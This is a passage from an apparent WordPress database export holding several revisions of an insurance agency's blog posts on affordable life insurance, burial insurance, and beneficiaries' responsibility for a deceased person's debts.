Investopedia, How Age Affects Life Insurance Rates, 2019, <a href=\"https://www.investopedia.com/articles/personal-finance/022615/how-age-affects-life-insurance-rates.asp\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/articles/personal-finance/022615/how-age-affects-life-insurance-rates.asp</a></span></em>','5 Tips For Finding Life Insurance That Fits Your Budget','','inherit','closed','closed','','333-revision-v1','','','2023-03-14 14:08:03','2023-03-14 14:08:03','',333,'http://cmdev-site1.com/?p=340',0,'revision','',0),(341,3,'2023-03-14 14:08:54','2023-03-14 14:08:54','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nBuying life insurance doesn’t mean you have to sacrifice the quality of your coverage.\r\n\r\nIn this blog, learn five tips to help secure life insurance that fits your budget without compromising the quality of the coverage you deserve.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>5 Tips and Tricks to Finding Affordable Life Insurance</h3>\r\n<ol>\r\n 	<li><img class=\"alignleft size-medium wp-image-337\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/5-Good-Tips-Thought-bubble-Cropped-2866x2700-1-300x283.jpg\" alt=\"\" width=\"300\" height=\"283\" />Choose the best life insurance policy for your situation. Understanding what you and your family need is one of the first steps toward finding coverage. Consider your family’s unique set of needs and history, as well as all of your financial obligations. In doing so, you can help ensure that you select the right amount of coverage to fit your family’s needs while giving you the tools necessary to responsibly estimate the amount of coverage available for your financial situation.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Buy life insurance as early as possible. Life insurance may be significantly cheaper the younger you are when you purchase it. With increased age comes increased health risks, all of which can influence the premium rate of your policy. In fact, life insurance policy rates rise an average of eight to ten percent each year you put off applying.<sup>1</sup> To give yourself the best chance in finding a life insurance policy, buy early. This way, you may be able to lock in the same premium rates you have at a younger age for the duration of the policy—saving you money for years to come.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Use quote websites wisely. One of the fastest ways to review what type of life insurance may best fit your financial situation is through the use of a quote website. Quote websites are particularly useful as they provide users with a quick and easy way to view their life insurance options and possible costs. Make sure your quote websites compare quotes from multiple insurers to give yourself the best start!\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Consider a term life insurance policy—especially for those over 50 years of age. For those older in age, one may want to consider purchasing a term life insurance policy. A term life policy is often less expensive than a whole life insurance policy and typically only provides a death benefit in the event of the insured’s death so long as the death occurs during the duration of the policy.<sup>1</sup> However, despite term life policies lacking certain features associated with whole life, it doesn’t mean that term life policies are bad. In fact, term life policies have long been a viable option for young people and older generations alike and are well worth considering.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Work with an independent broker. Knowing how to get a life insurance policy is important, but so is recognizing when you need help in deciding on one. An independent broker can help inform you of life insurance products you should consider, provide valuable information on certain insurers, and help guide you through the process with ease. If you’re having trouble deciding on a policy—or just want some extra help—phoning your local, independent broker may be the best decision you make.</li>\r\n</ol>\r\nFinding life insurance doesn’t have to be difficult, but it does require a little bit of work.\r\n\r\nBy following these five tips and tricks, you can help improve your chances of finding the best life insurance policy to fit your needs without breaking the bank.\r\n\r\nRemember to do your research, weigh your options, compare your quotes wisely, and reach out for help when you need it most.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Investopedia, How Age Affects Life Insurance Rates, 2019, <a href=\"https://www.investopedia.com/articles/personal-finance/022615/how-age-affects-life-insurance-rates.asp\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/articles/personal-finance/022615/how-age-affects-life-insurance-rates.asp</a></span></em>','5 Tips For Finding Life Insurance That Fits Your Budget','','inherit','closed','closed','','333-revision-v1','','','2023-03-14 14:08:54','2023-03-14 14:08:54','',333,'http://cmdev-site1.com/?p=341',0,'revision','',0),(342,3,'2023-03-14 14:09:11','2023-03-14 14:09:11','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nBuying life insurance doesn’t mean you have to sacrifice the quality of your coverage.\r\n\r\nIn this blog, learn five tips to help secure life insurance that fits your budget without compromising the quality of the coverage you deserve.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>5 Tips and Tricks to Finding Affordable Life Insurance\r\n<span style=\"color: #ffffff;\">-</span></h3>\r\n<ol>\r\n 	<li><img class=\"alignleft size-medium wp-image-337\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/5-Good-Tips-Thought-bubble-Cropped-2866x2700-1-300x283.jpg\" alt=\"\" width=\"300\" height=\"283\" />Choose the best life insurance policy for your situation. Understanding what you and your family need is one of the first steps toward finding coverage. Consider your family’s unique set of needs and history, as well as all of your financial obligations. In doing so, you can help ensure that you select the right amount of coverage to fit your family’s needs while giving you the tools necessary to responsibly estimate the amount of coverage available for your financial situation.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Buy life insurance as early as possible. Life insurance may be significantly cheaper the younger you are when you purchase it. With increased age comes increased health risks, all of which can influence the premium rate of your policy. In fact, life insurance policy rates rise an average of eight to ten percent each year you put off applying.<sup>1</sup> To give yourself the best chance in finding a life insurance policy, buy early. This way, you may be able to lock in the same premium rates you have at a younger age for the duration of the policy—saving you money for years to come.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Use quote websites wisely. One of the fastest ways to review what type of life insurance may best fit your financial situation is through the use of a quote website. Quote websites are particularly useful as they provide users with a quick and easy way to view their life insurance options and possible costs. Make sure your quote websites compare quotes from multiple insurers to give yourself the best start!\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Consider a term life insurance policy—especially for those over 50 years of age. For those older in age, one may want to consider purchasing a term life insurance policy. A term life policy is often less expensive than a whole life insurance policy and typically only provides a death benefit in the event of the insured’s death so long as the death occurs during the duration of the policy.<sup>1</sup> However, despite term life policies lacking certain features associated with whole life, it doesn’t mean that term life policies are bad. In fact, term life policies have long been a viable option for young people and older generations alike and are well worth considering.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Work with an independent broker. Knowing how to get a life insurance policy is important, but so is recognizing when you need help in deciding on one. An independent broker can help inform you of life insurance products you should consider, provide valuable information on certain insurers, and help guide you through the process with ease. If you’re having trouble deciding on a policy—or just want some extra help—phoning your local, independent broker may be the best decision you make.</li>\r\n</ol>\r\nFinding life insurance doesn’t have to be difficult, but it does require a little bit of work.\r\n\r\nBy following these five tips and tricks, you can help improve your chances of finding the best life insurance policy to fit your needs without breaking the bank.\r\n\r\nRemember to do your research, weigh your options, compare your quotes wisely, and reach out for help when you need it most.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Investopedia, How Age Affects Life Insurance Rates, 2019, <a href=\"https://www.investopedia.com/articles/personal-finance/022615/how-age-affects-life-insurance-rates.asp\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/articles/personal-finance/022615/how-age-affects-life-insurance-rates.asp</a></span></em>','5 Tips For Finding Life Insurance That Fits Your Budget','','inherit','closed','closed','','333-revision-v1','','','2023-03-14 14:09:11','2023-03-14 14:09:11','',333,'http://cmdev-site1.com/?p=342',0,'revision','',0),(343,3,'2023-03-14 14:14:20','2023-03-14 14:14:20','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nIf you died tomorrow, how would your family pay for your burial? According to the World Population Review, the average cost of a funeral in 2020 is between $7,000 and $9,000.<sup>1</sup>\r\n\r\nWhile the change in cost may not seem like much to a grieving family, the price tag may be overwhelming—which is where burial insurance comes in to help lessen the cost.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What is Burial Insurance?</h3>\r\nBurial insurance often has different names to help soften its purpose, including but not limited to “final expense,” “memorial,” and “pre-need” insurance.<sup>2</sup> However, no matter the name, burial insurance is designed to help families pay for burial costs and tie up any financial lose ends the deceased may have.\r\n\r\nBurial insurance is offered by an array of life insurance companies and offers benefits up to a certain limit. This limit is designed to help pay for burial or cremation costs that may cost upwards of thousands of dollars—helping families put their loved ones to rest with minimal financial stress.<sup>1</sup>\r\n\r\nSince burial insurance policies differ by provider, you may find those burial insurance policies offered in the form of term or whole life, depending on who you speak to.<sup>3</sup>\r\n\r\nGenerally speaking, the death benefit for a burial insurance policy is low-ranging anywhere from $5,000 to $25,000 on average, though others may have higher benefits.<sup>3</sup>\r\n\r\nAfter the death of the insured, the beneficiary or beneficiaries listed can use the death benefit provided by the policy to pay for whatever they see fit. This may include funeral expenses, outstanding medical bills, legal costs, or any outstanding debts.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What You Should Know About Burial Insurance</h3>\r\nDespite burial insurance typically being marketed towards seniors, burial insurance can be purchased for anyone at any age.\r\n\r\nIn fact, burial insurance is often presented as “easy to get,” with some providers of burial insurance not even asking for a completed medical exam to qualify.<sup>2</sup>\r\n\r\nWhile burial insurance policies don’t offer high death benefits, their low to mid-range death benefits can help families pay for an array of costs while remaining affordable—making it a compelling sell for those looking to provide financial security for their family at an affordable price.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>To Summarize</h3>\r\nBurial insurance can be a valuable asset for those looking for a way to help pay for their burial expenses without burdening themselves or their family.\r\n\r\nHowever, since there is such an array of burial insurance providers and policies available at any given time, it’s essential you do your research before committing to a single policy.\r\n\r\nBy evaluating your needs, the needs of your family, and your options, you’ll be equipped to make the best possible decision about burial insurance.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. World Population Review, Average Funeral Cost by State 2020, 2020, <a href=\"http://worldpopulationreview.com/states/average-funeral-cost-by-state/\" target=\"_blank\" rel=\"noopener noreferrer\">http://worldpopulationreview.com/states/average-funeral-cost-by-state/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">2. Investopedia, Burial Insurance vs. Life Insurance: What’s the Difference?, 2019, <a href=\"https://www.investopedia.com/articles/personal-finance/111314/burial-insurance-vs-life-insurance.asp\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/articles/personal-finance/111314/burial-insurance-vs-life-insurance.asp</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">3. Protective, Types of Life Insurance for Funeral Costs, n.p., <a href=\"https://www.protective.com/learning-center/life-insurance/life-insurance-basics/is-burial-insurance-different-from-preneed-funeral-insurance/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.protective.com/learning-center/life-insurance/life-insurance-basics/is-burial-insurance-different-from-preneed-funeral-insurance/</a></span></em>','What Is Burial Insurance?','','publish','open','open','','what-is-burial-insurance','','','2023-03-19 17:50:58','2023-03-19 17:50:58','',0,'http://cmdev-site1.com/?p=343',0,'post','',0),(344,3,'2023-03-14 14:13:54','2023-03-14 14:13:54','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nIf you died tomorrow, how would your family pay for your burial? According to the World Population Review, the average cost of a funeral in 2020 is between $7,000 and $9,000.<sup>1</sup>\r\n\r\nWhile the change in cost may not seem like much to a grieving family, the price tag may be overwhelming—which is where burial insurance comes in to help lessen the cost.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What is Burial Insurance?</h3>\r\nBurial insurance often has different names to help soften its purpose, including but not limited to “final expense,” “memorial,” and “pre-need” insurance.<sup>2</sup> However, no matter the name, burial insurance is designed to help families pay for burial costs and tie up any financial lose ends the deceased may have.\r\n\r\nBurial insurance is offered by an array of life insurance companies and offers benefits up to a certain limit. This limit is designed to help pay for burial or cremation costs that may cost upwards of thousands of dollars—helping families put their loved ones to rest with minimal financial stress.<sup>1</sup>\r\n\r\nSince burial insurance policies differ by provider, you may find those burial insurance policies offered in the form of term or whole life, depending on who you speak to.<sup>3</sup>\r\n\r\nGenerally speaking, the death benefit for a burial insurance policy is low-ranging anywhere from $5,000 to $25,000 on average, though others may have higher benefits.<sup>3</sup>\r\n\r\nAfter the death of the insured, the beneficiary or beneficiaries listed can use the death benefit provided by the policy to pay for whatever they see fit. This may include funeral expenses, outstanding medical bills, legal costs, or any outstanding debts.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What You Should Know About Burial Insurance</h3>\r\nDespite burial insurance typically being marketed towards seniors, burial insurance can be purchased for anyone at any age.\r\n\r\nIn fact, burial insurance is often presented as “easy to get,” with some providers of burial insurance not even asking for a completed medical exam to qualify.<sup>2</sup>\r\n\r\nWhile burial insurance policies don’t offer high death benefits, their low to mid-range death benefits can help families pay for an array of costs while remaining affordable—making it a compelling sell for those looking to provide financial security for their family at an affordable price.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>To Summarize</h3>\r\nBurial insurance can be a valuable asset for those looking for a way to help pay for their burial expenses without burdening themselves or their family.\r\n\r\nHowever, since there is such an array of burial insurance providers and policies available at any given time, it’s essential you do your research before committing to a single policy.\r\n\r\nBy evaluating your needs, the needs of your family, and your options, you’ll be equipped to make the best possible decision about burial insurance. For any questions, we suggest you contact your local insurance agent or financial advisor.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. World Population Review, Average Funeral Cost by State 2020, 2020, <a href=\"http://worldpopulationreview.com/states/average-funeral-cost-by-state/\" target=\"_blank\" rel=\"noopener noreferrer\">http://worldpopulationreview.com/states/average-funeral-cost-by-state/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">2. Investopedia, Burial Insurance vs. Life Insurance: What’s the Difference?, 2019, <a href=\"https://www.investopedia.com/articles/personal-finance/111314/burial-insurance-vs-life-insurance.asp\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/articles/personal-finance/111314/burial-insurance-vs-life-insurance.asp</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">3. Protective, Types of Life Insurance for Funeral Costs, n.p., <a href=\"https://www.protective.com/learning-center/life-insurance/life-insurance-basics/is-burial-insurance-different-from-preneed-funeral-insurance/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.protective.com/learning-center/life-insurance/life-insurance-basics/is-burial-insurance-different-from-preneed-funeral-insurance/</a></span></em>','What Is Burial Insurance?','','inherit','closed','closed','','343-revision-v1','','','2023-03-14 14:13:54','2023-03-14 14:13:54','',343,'http://cmdev-site1.com/?p=344',0,'revision','',0),(345,3,'2023-03-14 14:22:22','2023-03-14 14:22:22','<span style=\"font-size: 8pt;\">By Corey A. Jones</span>\r\n\r\nThe tragedy of a loved one’s passing brings so many burdens to the surviving family members: grief, fatigue, and financial questions.\r\n\r\nYou have to plan and have a funeral and then somehow deal with the overwhelming task of notifying creditors of their passing.\r\n\r\nThen there’s the life insurance. Does it have to pay the outstanding debts of the decedent? How does all of this work?\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h4>Who Is Responsible For The Debts of the Deceased?</h4>\r\nWhen someone dies, their estate (everything owned at the time of death) may go into probate, during which the will is reviewed, and the administration of the estate is handled.<sup>1</sup>\r\n\r\nThe estate is generally responsible to meet the obligations of the deceased. However, other surviving family members may still be fiscally responsible if the deceased had co-signers on any loans or was married in a community property state and has a surviving spouse.\r\n\r\nInheritors of estate property, such as a house, car, boat, etc., that are subject to a nonrecourse debt are still required to either pay off any outstanding balance—sometimes by selling the property—or take over remaining payments until the debt has been paid in full.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h4>What is a Beneficiary?</h4>\r\nRetirement accounts and life insurance policies generally have someone named to receive or inherit the proceeds in the event of the owner’s death.\r\n\r\nThat person is called the “beneficiary.” Designating a beneficiary for these accounts not only clarifies your asset recipients but it also makes it easier for them to receive the proceeds and avoid waiting for the probate process to be completed.<sup>2\r\n<span style=\"color: #ffffff;\">-</span></sup>\r\n<h4>Beneficiaries and Their Responsibilities</h4>\r\nThankfully, if you are named the primary beneficiary—the person to whom the payout normally goes to in the event of the policyholder’s death—that money is yours and is not usually required to cover the insured’s remaining debts. There are exceptions, however.\r\n\r\nIf your name is listed on any existing debt, perhaps as a cosigner, or you live in a community property state, your current assets (including life insurance inheritance) may be subject to community property rules and taxes at the state level.\r\n\r\nAs of 2018, 9 states impose community property laws: Arizona, California, Idaho, Louisiana, Nevada, New Mexico, Texas, Washington, and Wisconsin.<sup>3</sup>\r\n\r\n“Community Property” is defined under the law of each individual state. To determine if life insurance proceeds are included in your state, you should seek legal advice specific to the state laws you are subject to.\r\n<figure>\r\n\r\n[caption id=\"\" align=\"alignleft\" width=\"250\"]<img class=\"article_image\" src=\"https://e806.globelifeinsurance.com/images/article_images/community-property-states.jpg\" alt=\"Debt After Death: As a Policy Beneficiary, What Do I Have To Do? | Globe Life\" width=\"250\" height=\"158\" /> <span style=\"font-size: 8pt;\">Community Property States by Legalskeptic - Own work, CC BY-SA 3.0, https://commons.wikimedia.org/w/index.php?curid=16037686</span>[/caption]\r\n\r\n<figcaption>Additionally, if the estate is paid as the beneficiary, the proceeds from any retirement accounts or life insurance policies would go to the estate itself versus an individual. In that case, the benefits can be used to pay any outstanding debt.<sup>2\r\n<span style=\"color: #ffffff;\">-</span>\r\n</sup>Additionally, a will can give the executor of an estate permission to cover certain obligations with the life insurance proceeds.<sup>4\r\n</sup><span style=\"color: #ffffff;\">-</span></figcaption></figure>\r\n<h4>Estate Planning</h4>\r\nPlanning ahead is one of the best choices you can make to protect your loved ones or help aging parents with estate organization.\r\n\r\nWhile life insurance beneficiaries are typically not required to use the money to pay off debts owed by the estate, things such as funeral costs may be their obligation and not that of the estate. Having a strategy in place can help provide peace of mind for those left behind.\r\n\r\nProtection against the unexpected is exactly what life insurance was designed to provide. It is imperative to have the right amount of insurance coverage that is best for you and your family.\r\n\r\nBut just as important is ensuring that the coverage you have and the designations you’ve chosen are the most suitable for any post-mortem debt and tax obligations. By having a plan in place, you can safeguard your family’s legacy and continue to have a positive influence on their futures.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Nerdwallet. (2018, May 8). What Happens to Your Debts After You Die. Retrieved from <a href=\"https://www.nerdwallet.com/blog/finance/debts-after-death-life-insurance/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.nerdwallet.com/blog/finance/debts-after-death-life-insurance/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">2. Garber, Julie. (2018, October 20). When Life Insurance Is Part of an Estate. Retrieved from <a href=\"https://www.thebalance.com/must-life-insurance-be-used-to-pay-a-decedent-s-bills-3505232\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.thebalance.com/must-life-insurance-be-used-to-pay-a-decedent-s-bills-3505232</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">3. Laurence, Bethany K. Debt and Marriage: When Do I Owe My Spouse’s Debts? Retrieved from <a href=\"https://www.nolo.com/legal-encyclopedia/debt-marriage-owe-spouse-debts-29572.html\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.nolo.com/legal-encyclopedia/debt-marriage-owe-spouse-debts-29572.html</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">4. Real Insurance. (2018, August 6). Understanding How Debt Impacts Life Insurance Payouts. Retrieved from <a href=\"https://www.realinsurance.com.au/life-insurance/insurance-matters/how-debt-impacts-life-insurance\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.realinsurance.com.au/life-insurance/insurance-matters/how-debt-impacts-life-insurance</a></span></em>\r\n<div id=\"malwarebytes-root\"></div>','Debt After Death: As A Policy Beneficiary, What Do I Have To Do?','','publish','open','open','','debt-after-death-as-a-policy-beneficiary-what-do-i-have-to-do','','','2023-03-19 17:36:33','2023-03-19 17:36:33','',0,'http://cmdev-site1.com/?p=345',0,'post','',0),(346,3,'2023-03-14 14:21:10','2023-03-14 14:21:10','<span style=\"font-size: 8pt;\">By Corey A. Jones</span>\r\n\r\nThe tragedy of a loved one’s passing brings so many burdens to the surviving family members: grief, fatigue, and financial questions. You have to plan and have a funeral and then somehow deal with the overwhelming task of notifying creditors of their passing.\r\n\r\nThen there’s the life insurance. Does it have to pay the outstanding debts of the decedent? How does all of this work?\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h4>Who Is Responsible For The Debts of the Deceased?</h4>\r\nWhen someone dies, their estate (everything owned at the time of death) may go into probate, during which the will is reviewed, and the administration of the estate is handled.<sup>1</sup>\r\n\r\nThe estate is generally responsible to meet the obligations of the deceased. However, other surviving family members may still be fiscally responsible if the deceased had co-signers on any loans or was married in a community property state and has a surviving spouse.\r\n\r\nInheritors of estate property, such as a house, car, boat, etc., that are subject to a nonrecourse debt are still required to either pay off any outstanding balance—sometimes by selling the property—or take over remaining payments until the debt has been paid in full.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h4>What is a Beneficiary?</h4>\r\nRetirement accounts and life insurance policies generally have someone named to receive or inherit the proceeds in the event of the owner’s death.\r\n\r\nThat person is called the “beneficiary.” Designating a beneficiary for these accounts not only clarifies your asset recipients but it also makes it easier for them to receive the proceeds and avoid waiting for the probate process to be completed.<sup>2\r\n<span style=\"color: #ffffff;\">-</span></sup>\r\n<h4>Beneficiaries and Their Responsibilities</h4>\r\nThankfully, if you are named the primary beneficiary—the person to whom the payout normally goes to in the event of the policyholder’s death—that money is yours and is not usually required to cover the insured’s remaining debts. There are exceptions, however.\r\n\r\nIf your name is listed on any existing debt, perhaps as a cosigner, or you live in a community property state, your current assets (including life insurance inheritance) may be subject to community property rules and taxes at the state level.\r\n\r\nAs of 2018, 9 states impose community property laws: Arizona, California, Idaho, Louisiana, Nevada, New Mexico, Texas, Washington, and Wisconsin.<sup>3</sup>\r\n\r\n“Community Property” is defined under the law of each individual state. To determine if life insurance proceeds are included in your state, you should seek legal advice specific to the state laws you are subject to.\r\n<figure>\r\n\r\n[caption id=\"\" align=\"alignleft\" width=\"250\"]<img class=\"article_image\" src=\"https://e806.globelifeinsurance.com/images/article_images/community-property-states.jpg\" alt=\"Debt After Death: As a Policy Beneficiary, What Do I Have To Do? | Globe Life\" width=\"250\" height=\"158\" /> <span style=\"font-size: 8pt;\">Community Property States by Legalskeptic - Own work, CC BY-SA 3.0, https://commons.wikimedia.org/w/index.php?curid=16037686</span>[/caption]\r\n\r\n<figcaption>Additionally, if the estate is paid as the beneficiary, the proceeds from any retirement accounts or life insurance policies would go to the estate itself versus an individual. In that case, the benefits can be used to pay any outstanding debt.<sup>2\r\n<span style=\"color: #ffffff;\">-</span>\r\n</sup>Additionally, a will can give the executor of an estate permission to cover certain obligations with the life insurance proceeds.<sup>4\r\n</sup><span style=\"color: #ffffff;\">-</span></figcaption></figure>\r\n<h4>Estate Planning</h4>\r\nPlanning ahead is one of the best choices you can make to protect your loved ones or help aging parents with estate organization.\r\n\r\nWhile life insurance beneficiaries are typically not required to use the money to pay off debts owed by the estate, things such as funeral costs may be their obligation and not that of the estate. Having a strategy in place can help provide peace of mind for those left behind.\r\n\r\nProtection against the unexpected is exactly what life insurance was designed to provide. It is imperative to have the right amount of insurance coverage that is best for you and your family.\r\n\r\nBut just as important is ensuring that the coverage you have and the designations you’ve chosen are the most suitable for any post-mortem debt and tax obligations. By having a plan in place, you can safeguard your family’s legacy and continue to have a positive influence on their futures.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Nerdwallet. (2018, May 8). What Happens to Your Debts After You Die. Retrieved from <a href=\"https://www.nerdwallet.com/blog/finance/debts-after-death-life-insurance/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.nerdwallet.com/blog/finance/debts-after-death-life-insurance/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">2. Garber, Julie. (2018, October 20). When Life Insurance Is Part of an Estate. Retrieved from <a href=\"https://www.thebalance.com/must-life-insurance-be-used-to-pay-a-decedent-s-bills-3505232\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.thebalance.com/must-life-insurance-be-used-to-pay-a-decedent-s-bills-3505232</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">3. Laurence, Bethany K. Debt and Marriage: When Do I Owe My Spouse’s Debts? Retrieved from <a href=\"https://www.nolo.com/legal-encyclopedia/debt-marriage-owe-spouse-debts-29572.html\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.nolo.com/legal-encyclopedia/debt-marriage-owe-spouse-debts-29572.html</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">4. Real Insurance. (2018, August 6). Understanding How Debt Impacts Life Insurance Payouts. Retrieved from <a href=\"https://www.realinsurance.com.au/life-insurance/insurance-matters/how-debt-impacts-life-insurance\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.realinsurance.com.au/life-insurance/insurance-matters/how-debt-impacts-life-insurance</a></span></em>','Debt After Death: As A Policy Beneficiary, What Do I Have To Do?','','inherit','closed','closed','','345-revision-v1','','','2023-03-14 14:21:10','2023-03-14 14:21:10','',345,'http://cmdev-site1.com/?p=346',0,'revision','',0),(347,3,'2023-03-14 14:22:22','2023-03-14 14:22:22','<span style=\"font-size: 8pt;\">By Corey A. Jones</span>\r\n\r\nThe tragedy of a loved one’s passing brings so many burdens to the surviving family members: grief, fatigue, and financial questions.\r\n\r\nYou have to plan and have a funeral and then somehow deal with the overwhelming task of notifying creditors of their passing.\r\n\r\nThen there’s the life insurance. Does it have to pay the outstanding debts of the decedent? How does all of this work?\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h4>Who Is Responsible For The Debts of the Deceased?</h4>\r\nWhen someone dies, their estate (everything owned at the time of death) may go into probate, during which the will is reviewed, and the administration of the estate is handled.<sup>1</sup>\r\n\r\nThe estate is generally responsible to meet the obligations of the deceased. However, other surviving family members may still be fiscally responsible if the deceased had co-signers on any loans or was married in a community property state and has a surviving spouse.\r\n\r\nInheritors of estate property, such as a house, car, boat, etc., that are subject to a nonrecourse debt are still required to either pay off any outstanding balance—sometimes by selling the property—or take over remaining payments until the debt has been paid in full.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h4>What is a Beneficiary?</h4>\r\nRetirement accounts and life insurance policies generally have someone named to receive or inherit the proceeds in the event of the owner’s death.\r\n\r\nThat person is called the “beneficiary.” Designating a beneficiary for these accounts not only clarifies your asset recipients but it also makes it easier for them to receive the proceeds and avoid waiting for the probate process to be completed.<sup>2\r\n<span style=\"color: #ffffff;\">-</span></sup>\r\n<h4>Beneficiaries and Their Responsibilities</h4>\r\nThankfully, if you are named the primary beneficiary—the person to whom the payout normally goes to in the event of the policyholder’s death—that money is yours and is not usually required to cover the insured’s remaining debts. There are exceptions, however.\r\n\r\nIf your name is listed on any existing debt, perhaps as a cosigner, or you live in a community property state, your current assets (including life insurance inheritance) may be subject to community property rules and taxes at the state level.\r\n\r\nAs of 2018, 9 states impose community property laws: Arizona, California, Idaho, Louisiana, Nevada, New Mexico, Texas, Washington, and Wisconsin.<sup>3</sup>\r\n\r\n“Community Property” is defined under the law of each individual state. To determine if life insurance proceeds are included in your state, you should seek legal advice specific to the state laws you are subject to.\r\n<figure>\r\n\r\n[caption id=\"\" align=\"alignleft\" width=\"250\"]<img class=\"article_image\" src=\"https://e806.globelifeinsurance.com/images/article_images/community-property-states.jpg\" alt=\"Debt After Death: As a Policy Beneficiary, What Do I Have To Do? | Globe Life\" width=\"250\" height=\"158\" /> <span style=\"font-size: 8pt;\">Community Property States by Legalskeptic - Own work, CC BY-SA 3.0, https://commons.wikimedia.org/w/index.php?curid=16037686</span>[/caption]\r\n\r\n<figcaption>Additionally, if the estate is paid as the beneficiary, the proceeds from any retirement accounts or life insurance policies would go to the estate itself versus an individual. In that case, the benefits can be used to pay any outstanding debt.<sup>2\r\n<span style=\"color: #ffffff;\">-</span>\r\n</sup>Additionally, a will can give the executor of an estate permission to cover certain obligations with the life insurance proceeds.<sup>4\r\n</sup><span style=\"color: #ffffff;\">-</span></figcaption></figure>\r\n<h4>Estate Planning</h4>\r\nPlanning ahead is one of the best choices you can make to protect your loved ones or help aging parents with estate organization.\r\n\r\nWhile life insurance beneficiaries are typically not required to use the money to pay off debts owed by the estate, things such as funeral costs may be their obligation and not that of the estate. Having a strategy in place can help provide peace of mind for those left behind.\r\n\r\nProtection against the unexpected is exactly what life insurance was designed to provide. It is imperative to have the right amount of insurance coverage that is best for you and your family.\r\n\r\nBut just as important is ensuring that the coverage you have and the designations you’ve chosen are the most suitable for any post-mortem debt and tax obligations. By having a plan in place, you can safeguard your family’s legacy and continue to have a positive influence on their futures.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Nerdwallet. (2018, May 8). What Happens to Your Debts After You Die. Retrieved from <a href=\"https://www.nerdwallet.com/blog/finance/debts-after-death-life-insurance/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.nerdwallet.com/blog/finance/debts-after-death-life-insurance/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">2. Garber, Julie. (2018, October 20). When Life Insurance Is Part of an Estate. Retrieved from <a href=\"https://www.thebalance.com/must-life-insurance-be-used-to-pay-a-decedent-s-bills-3505232\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.thebalance.com/must-life-insurance-be-used-to-pay-a-decedent-s-bills-3505232</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">3. Laurence, Bethany K. Debt and Marriage: When Do I Owe My Spouse’s 